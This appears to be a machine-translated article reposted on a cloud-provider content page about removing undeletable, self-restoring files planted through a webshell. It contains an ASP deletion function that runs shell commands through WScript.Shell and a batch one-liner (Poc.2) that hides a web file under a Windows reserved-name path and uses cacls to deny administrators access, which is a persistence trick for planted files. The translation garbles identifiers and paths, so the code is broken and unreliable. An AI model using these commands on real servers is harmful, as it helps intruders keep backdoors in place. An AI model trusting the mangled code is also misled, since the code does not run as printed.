Methods To cope with infinite file recovery in webshell

Source: Internet
Author: User

In this case, a file in webshell (webshell only) cannot be deleted and cannot be modified. The attribute can be deleted after attributes is removed, but the file is instantly "full of blood, in the original place"

It seems that this situation has been encountered before. It was also discussed with knell at the beginning. It is agreed that a file under the Server intercepts some parameters through requst, and then uses Server. createObject ("Scripting. fileSystemObject ") to create the" undeleteable "file, set the Attributes permission, and then use the external server to continuously get and post the package to restore the file without limit --

In this regard, I wrote a script and tested it to perfectly prevent this disgusting attack method.

Poc.1:
____________________________________________________________________________
Function DelAttrib (TheFile) thefile is the file to be modified. You 'd better write a from form by yourself.
Response. write "Loading...:" & TheFile & "... <br>"
Set fs = Server. CreateObject ("Scripting. FileSystemObject ")
IF fs. FileExists ("\." & TheFile) then
Set f = fs. GetFile ("\." & TheFile)
F. Attributes = 0 set Attributes
Set f = nothing
Response. write "Less Success! "Prompt after success
If Right (TheFile, 1) = "" or Right (TheFile, 1) = "/" or Left (Right (TheFile, 4), 1) <> "." then
Call fs. DeleteFolder (EE, true) delete an object
Response. write "Delete Success! "
Else
IF fs. FileExists ("\." & TheFile) then
FN = LCase (Mid (TheFile, Replace (TheFile, "", "/"), "/") + 1 ))
If Instr (FN, "com") <1 and Instr (FN, "con") <1 and Instr (FN, "aux") <1 and Instr (FN, "prn") <1 and Instr (FN, "nul") <1 then
Set f = fs. GetFile ("\." & TheFile )'
F. Attributes = 0
Set f = nothing
End if

Fs. Deletefile ("\." & TheFile) 'deletion Mode Based on windows Reserved Words
Response. write "Delete Success"
Else
Response. write "Open File Fail! "Error message
End if
End if
Else
Response. write "Open File Fail! "
END IF
Dim external shell, StrExec, ExecName
Set writable Shell = Server. CreateObject ("WScript. Shell") Call wscript to execute the bat script of Poc.2
StrExec = "D: webcmd.exe/c" is the custom cmd file.
ExecName = "D: webjfcx1_dea. bat" here is the bat script uploaded to the server.
Mongoshell.exe c (StrExec & "& ExecName). stdout. readall
Set fs = nothing
End Function
_____________________________________________________________________________
Poc.2:
--------------------------------------------
Copy d: weba. asp \. d: web. asp & attrib \. d: web. asp + a + r + s + h & cacls \. d: web. asp/e/d IUSR_WSPC-HVJ5FRCT79 & cacls \. d: web. asp/e/g IUSR_WSPC-HVJ5FRCT79: r & cacls \. d: web. asp/e/d users & cacls \. d: web. asp/e/g users: r & cacls \. d: web. asp/e/d system & cacls \. d: web. asp/e/d administrators
The script is saved as bat, and d: weba. asp is the file path created by you. d: web. asp is the file path automatically restored. The iis user groups on different servers are different. Modify the file path by yourself.
--------------------------------------------
 

 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.